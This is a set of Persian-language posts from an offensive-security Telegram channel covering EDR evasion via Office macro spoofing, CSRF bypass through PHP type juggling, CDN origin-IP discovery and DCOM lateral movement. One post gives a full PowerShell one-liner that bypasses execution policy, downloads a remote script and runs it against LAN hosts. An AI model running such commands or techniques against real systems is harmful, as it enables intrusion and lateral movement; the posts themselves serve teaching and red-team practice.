#APTSimulator
کمپانی NextronSystems یک Simulator در خصوص تمرین در خصوص پیاده سازی تکنیک های #RT در مقابل #Endpoint Detection ها و سیستم های مانیتورینگ که مامور شکار حملات و تکنیک های استفاده شده ی هکرها هستش,

از لینک زیر میتوانید این Simulator رو دانلود و بر روی یک سیستم عامل ویندوزی ترجیحا نسخه 10 با سطح دسترسی Administrator باز کرده و سناریو مورد نظر خودتون رو از لیست موجود انتخاب و اجرا کنید...


https://github.com/NextronSystems/APTSimulator/releases
@Unk9vvN
#BurpBounty #Profiles
دو سال پیش یک محقق این پلاگین رو طراحی کرد و امروز نسخه ۳ اونم Release شده, ابزار #BB امکان Signature سازی آسیب پذیری های وب اپلکیشنی رو برای شما محیا میکنه تا شما پایلود های Customize خودتون رو در جریان اسکن Active و Passive در ابزار BurpSuite استفاده کنید, این مشکلی بود که سالها در ابزار BurpSuite احساس میشد چرا که بسیای از پایلود های مورد استفاده خودش بصورت پیشفرض تعریف شده بودند در حالی که هکر نیاز داشت پایلود های خودش رو مثلا با روش مبهم سازی خودش ارسال کنه,

شاید بگید که خب در Intruder امکانش بود که ما خودمون بصورت Customize پایلودهای خودمون رو تعریف کنیم, بله در Intruder این امکان بود اما بصورت وسیع در جریان Sitemap کردن قربانی امکان Detect وجود نداشت و از طرفی #BB امکانات ویژه تری رو هم فراهم میکنه مانند استفاده از Signature هایی که تا به حال هکرها ساخته اند در خصوص انواع آسیب پذیری ها و شما میتونید با دانلود اونها و Import در قسمت پروفایل از تجربیات و و نحوه پایلود ریزی و Detect آسیب پذیری بهره مند شوید نمونه ای از این Profiles ها برای #BB

Profile1
Profile2
Profile3
@Unk9vvN
#Iranian #NIDS
شاید تا به حال برای شما هم این سوال هم مطرح شده است که شرکت های فعال در حوزه دفاع سایبری در ایران چه محصولات و مکانیزم هایی در خصوص مقابله با حملات سایبری اندیشیده اند, یکی از شرکت های فعال این حوزه امن افزار گستر شریف است که به پشتوانه دانشگاه شریف و خصولتی بودنش توانسته در ایران پیشتازی کند,

اما با یک بررسی اجمالی و مقایسه تدابیر این شرکت متوجه نواقصی هم شده ایم از جمله تکیه بیش از حد به مکانیزم های NIDS و MidPoint ها که بصورت اغراق آمیز بیان شده که میتواند انواع حملات را با درصد بالا ۹۰ شکار کند, این درحالیست که بسیاری از حملات سایبری APT در دنیا برپایه اکسپلویت هایی طراحی میشود که آمیخته با پروتکل های حیاطیست,

آیا دیوایس های ایرانی میتواند متوجه پایلود شدن یک پروتکل در لایه ماشین کد بشوند؟آن هم اگر برپایه مبهم سازی های باینری پی ریزی شده باشد, این تنها یک نمونه از ابهامات موجود است, محصولاتی مانند Sana-DFS یا Parham میتواند کارآمدی خوبی در مقابل حملات روتین و معمول نشان دهد, اما آیا برای تکنیک های بیشمار #RT هم کارآمدی و عملکرد دارد? بدلیل مخفی بودن محصولات جواب سوالات سخت است.

@Unk9vvN
#Syscall #Linux_Kernel x64 (HelloWorld)
در بحث طراحی اکسپلویت الزاماتی از قبیل فهم چگونگی ارتباط درایورها در کرنل برای ما بسیار حیاطی و محسوس هستش, از همین روی در قالب یک مثال بصورت خلاصه وار چگونگی پیاده سازی تماس های syscall یا system call به کرنل رو تشریح خواهم کرد,

برای مثال ما یک سوال از کاربر پرسیده و جواب او را در صفحه چاپ خواهیم کرد, خب برای اینکار نیازه که به syscall های sys_read و sys_write و sys_exit اشاره کرد, مورد بعدی اینه که هر system call ثبات هایی رو بعنوان input های خودش تعیین میکنه که در syscall های مورد استفاده ما به این صورت خواهد بود

ثبات rax به منظور دریافت آیدی syscall هستش
ثبات rdi به منظور دریافت وضعیت input/output بودن syscall هستش
ثبات rsi به منظور دریافت آدرس بافری که میبایست write یا read بشه
و نهایتا ثبات rdx به منظور طول کاراکترهای منظور شده در rsi که اشاره به define byte مربوطه ما داره رو به syscall اعلام خواهد کرد

همانطور که در تصویر پست توضیح دادم (البته بدلیل استفاده از کلمات english در توضیحات فارسی, جمله کمی به هم ریخته) syscall ها مرتب فراخوانی شده اند.

@Unk9vvN
#Reconnaissance #Methodology
بسیاری بحث جمع آوری اطلاعات را یا یک مبحث روتینی میدانند که به واسطه چندی از ابزارها حاصل میشود، اما این یک تصور غلط است، چرا که بحث جمع آوری اطلاعات سالهاست که به مرحله استخراج اطلاعات سوئچ کرده، بسیاری برای مراجعه مختلف اقدام به گرد آوری اطلاعات از بستر شبکه های اجتماعی یا بصورت مستقیم از آی پی های زنده میکنند، و این اطلاعات را در قالب شبکه های خود بصورت ماهانه بفروش میرسانند، مانند Shodan

بگزارید مثالی بزنم، اگر شما میخواهید مثلا آی پی اصلی، سروری را که پشت CDN فایروال قرار گرفته را بدست بیاورید، میبایست به مراجعی که بصورت ۲۴ ساعته از آی پی های زنده در دنیا Snapshot تهیه میکنند مراجعه کرده و History قربانی را بررسی کنید، با این بررسی آیپی قبلی سروری که پشت CDN رفته،را میتوانید مشاهده کنید، بدین ترتیب میتوان گفت مکانیرم Reverse Proxy را دور زده ایم،

امروزه یکی از بزرگترین Tools های مورد بحث و مطرح کنفرانس های بلکهت محصول Maltego هستش، که در این امر بصورت یک مرکز کنترل جامع عمل میکند، یعنی بعضا برای استخراج اطلاعات با بیش از ۵۰ مرکز DataMining ارتباط میگیرد.

EXP
@Unk9vvN
#Type_Juggling for #CSRF_Protection Bypass
همونطور که میدونید در خصوص آسیب پذیری #CSRF یا درخواست جعلی مکانیزم های دفاعی وجود داره مانند #SameSite_Cookie و #Double_Submit_Cookie که قبلا راجبشون توضیحاتی داده شده،

https://t.me/Unk9vvN/880

نکته ای که در این پست میخوام بهش اشاره کنم اینه که با استفاده از آسیب پذیری #Type_Juggling میتوان مکانیزم های تولید توکن Nonce و در مجموع مکانیزم #Double_Submit_Cookie رو میتوان با ارسال مقادیر True دور زد، برای مثال در تصویر پست میبینید که هکر Condition آسیب پذیر رو که با استفاده از تابع ()strcmp که قراره دو هشی که یکی در سرور ذخیره هست رو با هشی که از پارامتر key-awesome دریافت میکنه رو مقایسه کنه که مشکل همینجاست که این مقایسه بصورت loose طراحی شده،

https://t.me/Unk9vvN/1049

و از اونجایی که میبایست جواب Condition بصورت Boolean باشه، هکر آمده و یک array به پارامتر key-awesome ارسال کرده و همین موضوع باعث شده مقدار hash$ برابر NULL قرار بگیره و همین موضوع خروجی تابع ()strcmp رو معادل NULL == 0 قرار بگیره و شرط برقرار و طبیعتا مکانیزم دور زده میشه...

@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Office_Macro #Spoof #Parent_Processes and #Command_line argv
اگر در خصوص حملات #APTs تحقیقاتی کرده باشید میدانید که بسیاری از آنها بر مبنای مهندسی اجتماعی فایل فرمت هایی مانند فرمت های محصولات #Office ماکروسافت هستند، از این روی بحث رهگیری #Macro های مخرب برای محصولات #EDR بسیار مهم و حیاتی هستش، و یکی از روش های رهگیری این #Macro ها بررسی Parent های پراسس برنامه هستش، و همچنین CommandLine که در Sysmon Event سیستم عامل ثبت میشه،

یک محقق با استفاده از زبان VBA که هم پشتیبانیش برای Macro نویسی در آفیس فراهمه هم میتوان با استفاده از آن با API Windows ارتباط برقرار کرد رو مورد استفاده قرار داده و با استفاده از تابع NtQueryInformationProcess آدرس ساختمان PEB رو بدست و با استفاده از تابع WriteProcessMemory اقدام و Overwrite کردن مقادیر CommandLine کرده،

همچنین با استفاده از OpenProcess که یک تابع خنثی برای #EDR ها محصوب میشه میشه، با این کار پراسس مثلا notepad ایجاد میشود اما با اجرای یک شلکد که بد از اجرا پارامترش Overwrite با یک کد خنثی خواهد شد.

https://github.com/christophetd/spoofing-office-macro
@Unk9vvN
#Top 10 #Extentions #BurpTools
شاید برای شما هم این سوال مطرح باشه که پلاگین های مفید و کارآمد ابزار #BurpSuite کدام ها میتونه باشه و ویژگی های اونها چیه؟ همونطور که در تصویر میبینید، برخی از آنها رو که مفید هستند رو برای شما معرفی کرده و نکاتی در خصوص ویژگی اونها خواهیم گفت:

.NET Beautifier
ابزاری برای مناسب نشان دادن کدهای .NET

Active Scan++
ابزاری برای اسکن اتوماتیک برخی CVE های معروف

CO2
ابزاری برای خودکارسازی پارامترهای SQLMap

Content-Type Convertor
ابزاری برای تبدیل فرمت داده های Json و XML

Logger++
ابزاری برای خروجی گرفتن لاگ های داده های ارسالی و دریافتی

JSON Web Token
ابزاری برای انواع حملات به JWT مانند None Key

Param Miner
ابزاری برای تست آسیب پذیری مسمومیت حافظه پنهان

PHP Object Injection Check
ابزاری برای تست پارامترهای Serialize برای آسیب پذیری PHPOi

Uploader Scanner
ابزاری در خصوص فازینگ Extentions های فیلدهای آپلود فایل

Turbo Intruder
ابزاری در خصوص حملات بروت فورس با امکان دور زدن مکانیزم های Recaptcha

موارد دیگر رو به خودتون میسپارم.


https://portswigger.net/bappstore
@Unk9vvN
#DCOM #Lateral_Movement
استفاده از #DCOM Object های مختلف که در سیستم عامل های ویندوز میتواند تعریف و بکار گرفته شود و امکان خوبی برای دور زدن مکانیزم های دفاعی بدهد، چرا که هر کدام از این #DCOM ها میتوانند بستر غیر مستقیمی برای داده هایی باشند که برای آنها ساخته شده اند, برای مثال ExcelDDE که در خصوص #DDE که در فایل فرمت Excel میتواند بکار گرفته شود,

# Open cmd (Administrator)
C:\Users\unk9vvn>%comspec% /K powershell.exe -ExecutionPolicy Bypass -NoExit -Command "$LAN = Get-NetIPAddress | Where-Object -FilterScript { $_.ValidLifetime -Lt ([TimeSpan]::FromDays(1)) } | Select-Object -Property IPAddress; Invoke-WebRequest -Uri https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1 -OutFile %temp%\Invoke-DCOM.ps1; cd %temp%; Import-Module .\Invoke-DCOM.ps1; Invoke-DCOM -ComputerName $LAN.IPAddress -Method MMC20.Application -Command 'calc.exe'; Remove-Item %temp%\Invoke-DCOM.ps1; exit"


https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Invoke-DCOM.ps1
@Unk9vvN
#OffensiveCON
یکی از دلایل عقب ماندگی علوم امنیت تهاجمی در ایران اینه که نگاه درستی چه در شرکت های فعال در حوزه خدمات دهی سایبری چه در دانشگاه ها و حتی میان خود محققین در این خصوص وجود نداره,

این علوم بصورت تک روی یا محدود کردن آن نمیتواند به حوزه نوآوری برسد, بلکه میبایست همانند کشورهای پیشتاز لیگ برتری از محققین را شرکت ها و خود محققین بوجود آورند تا بصورت جمعی و بر اساس کنش های علمی محصولات تحقیقاتی را به اشتراک گذاشته و جامعه علمی را به حرکت در آورند,

هستند کسانی که استراتژی های درست تحقیقاتی این علوم را میدانند اما بدلیل انحصار طلبی برای منابع خود علاقه ای به حرکت به این سو را ندارند, و ضربه آن را جوانان علاقمند و امنیت فضای اطلاعاتی کشور خواهند خورد,

البته آینده قرار نیست به این صورت باشد و علوم نوین آینده مانند هوش مصنوعی و غیره عجین شده با امنیت است و نگاه به امنیت هوشمندانه تر خواهد شد...

نمونه ای از این استراتژی در کشور آلمان با اسپانسری دو شرکت فعال ...

https://www.offensivecon.org/agenda/2019/
@Unk9vvN